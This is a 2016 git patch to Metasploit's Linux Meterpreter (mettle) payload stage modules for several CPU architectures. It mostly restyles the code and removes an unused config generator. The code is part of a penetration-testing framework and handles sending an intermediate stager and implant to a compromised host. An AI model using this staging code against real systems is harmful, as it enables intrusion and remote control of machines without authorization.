From 21bede1166d69f292cadb9efde240b110824b5c0 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 5 Jul 2016 03:33:25 -0500 Subject: [PATCH] unify stager style --- modules/payloads/stages/linux/armle/mettle.rb | 38 +++++------ .../payloads/stages/linux/mipsbe/mettle.rb | 64 ++++++------------- .../payloads/stages/linux/mipsle/mettle.rb | 64 ++++++------------- modules/payloads/stages/linux/x64/mettle.rb | 1 + modules/payloads/stages/linux/x86/mettle.rb | 1 + 5 files changed, 59 insertions(+), 109 deletions(-) diff --git a/modules/payloads/stages/linux/armle/mettle.rb b/modules/payloads/stages/linux/armle/mettle.rb index 83e348bbbf..0faed424b9 100644 --- a/modules/payloads/stages/linux/armle/mettle.rb +++ b/modules/payloads/stages/linux/armle/mettle.rb @@ -11,22 +11,25 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions def initialize(info = {}) - super(update_info(info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Inject the mettle server payload (staged)', - 'Author' => [ - 'Adam Cammack 'linux', - 'Arch' => ARCH_ARMLE, - 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_armle_Linux)) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter', + 'Description' => 'Inject the mettle server payload (staged)', + 'Author' => [ + 'Adam Cammack ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_ARMLE, + 'License' => MSF_LICENSE, + 'Session' => Msf::Sessions::Meterpreter_armle_Linux + ) + ) end def elf_ep(payload) elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) - ep = elf.elf_header.e_entry - return ep + elf.elf_header.e_entry end def handle_intermediate_stage(conn, payload) @@ -70,15 +73,12 @@ module MetasploitModule entry_offset ].pack('V*') - print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)") - - conn.put [midstager.length].pack('V') - conn.put midstager - - true + vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)") + conn.put([midstager.length].pack('V')) + conn.put(midstager) == midstager.length end - def generate_stage(opts={}) + def generate_stage(_opts = {}) MetasploitPayloads::Mettle.read('arm-linux-musleabi', 'mettle.bin') end end diff --git a/modules/payloads/stages/linux/mipsbe/mettle.rb b/modules/payloads/stages/linux/mipsbe/mettle.rb index 555f36687f..a8e44b2ec3 100644 --- a/modules/payloads/stages/linux/mipsbe/mettle.rb +++ b/modules/payloads/stages/linux/mipsbe/mettle.rb @@ -12,22 +12,25 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions def initialize(info = {}) - super(update_info(info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Inject the mettle server payload (staged)', - 'Author' => [ - 'Adam Cammack ' - ], - 'Platform' => 'linux', - 'Arch' => ARCH_MIPSBE, - 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux)) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter', + 'Description' => 'Inject the mettle server payload (staged)', + 'Author' => [ + 'Adam Cammack ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'License' => MSF_LICENSE, + 'Session' => Msf::Sessions::Meterpreter_mipsbe_Linux + ) + ) end def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - ep = elf.elf_header.e_entry - return ep + elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) + elf.elf_header.e_entry end def handle_intermediate_stage(conn, payload) @@ -83,40 +86,11 @@ module MetasploitModule 0 ].pack('N*') - print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)") - conn.put(midstager) - - true + vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)") + conn.put(midstager) == midstager.length end - def generate_stage(opts={}) - meterpreter = generate_meterpreter - #config = generate_config(opts) - #meterpreter + config - end - - def generate_meterpreter + def generate_stage(_opts = {}) MetasploitPayloads::Mettle.read('mips-linux-muslsf', 'mettle.bin') end - - def generate_config(opts={}) - opts[:uuid] ||= generate_payload_uuid - - # create the configuration block, which for staged connections is really simple. - config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => nil, - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config(opts)], - :extensions => [], - :ascii_str => true - } - - # create the configuration instance based off the parameters - config = Rex::Payloads::Meterpreter::Config.new(config_opts) - - # return the binary version of it - config.to_b - end end diff --git a/modules/payloads/stages/linux/mipsle/mettle.rb b/modules/payloads/stages/linux/mipsle/mettle.rb index f80684251c..d49c92016e 100644 --- a/modules/payloads/stages/linux/mipsle/mettle.rb +++ b/modules/payloads/stages/linux/mipsle/mettle.rb @@ -12,22 +12,25 @@ module MetasploitModule include Msf::Sessions::MeterpreterOptions def initialize(info = {}) - super(update_info(info, - 'Name' => 'Linux Meterpreter', - 'Description' => 'Inject the mettle server payload (staged)', - 'Author' => [ - 'Adam Cammack ' - ], - 'Platform' => 'linux', - 'Arch' => ARCH_MIPSLE, - 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_mipsle_Linux)) + super( + update_info( + info, + 'Name' => 'Linux Meterpreter', + 'Description' => 'Inject the mettle server payload (staged)', + 'Author' => [ + 'Adam Cammack ' + ], + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSLE, + 'License' => MSF_LICENSE, + 'Session' => Msf::Sessions::Meterpreter_mipsle_Linux + ) + ) end def elf_ep(payload) - elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) ) - ep = elf.elf_header.e_entry - return ep + elf = Rex::ElfParsey::Elf.new(Rex::ImageSource::Memory.new(payload)) + elf.elf_header.e_entry end def handle_intermediate_stage(conn, payload) @@ -83,40 +86,11 @@ module MetasploitModule 0 ].pack('V*') - print_status("Transmitting intermediate stager for over-sized stage...(#{midstager.length} bytes)") - conn.put(midstager) - - true + vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)") + conn.put(midstager) == midstager.length end - def generate_stage(opts={}) - meterpreter = generate_meterpreter - #config = generate_config(opts) - #meterpreter + config - end - - def generate_meterpreter + def generate_stage(_opts = {}) MetasploitPayloads::Mettle.read('mipsel-linux-muslsf', 'mettle.bin') end - - def generate_config(opts={}) - opts[:uuid] ||= generate_payload_uuid - - # create the configuration block, which for staged connections is really simple. - config_opts = { - :arch => opts[:uuid].arch, - :exitfunk => nil, - :expiration => datastore['SessionExpirationTimeout'].to_i, - :uuid => opts[:uuid], - :transports => [transport_config(opts)], - :extensions => [], - :ascii_str => true - } - - # create the configuration instance based off the parameters - config = Rex::Payloads::Meterpreter::Config.new(config_opts) - - # return the binary version of it - config.to_b - end end diff --git a/modules/payloads/stages/linux/x64/mettle.rb b/modules/payloads/stages/linux/x64/mettle.rb index 010e66788f..e5f78d9aee 100644 --- a/modules/payloads/stages/linux/x64/mettle.rb +++ b/modules/payloads/stages/linux/x64/mettle.rb @@ -81,6 +81,7 @@ module MetasploitModule add rsi, rax jmp rsi ) + midstager = Metasm::Shellcode.assemble(Metasm::X64.new, midstager_asm).encode_string vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)") conn.put(midstager) == midstager.length diff --git a/modules/payloads/stages/linux/x86/mettle.rb b/modules/payloads/stages/linux/x86/mettle.rb index 93552c4d16..2b70f7892c 100644 --- a/modules/payloads/stages/linux/x86/mettle.rb +++ b/modules/payloads/stages/linux/x86/mettle.rb @@ -84,6 +84,7 @@ module MetasploitModule add edx, eax jmp edx ) + midstager = Metasm::Shellcode.assemble(Metasm::X86.new, midstager_asm).encode_string vprint_status("Transmitting intermediate stager...(#{midstager.length} bytes)") conn.put(midstager) == midstager.length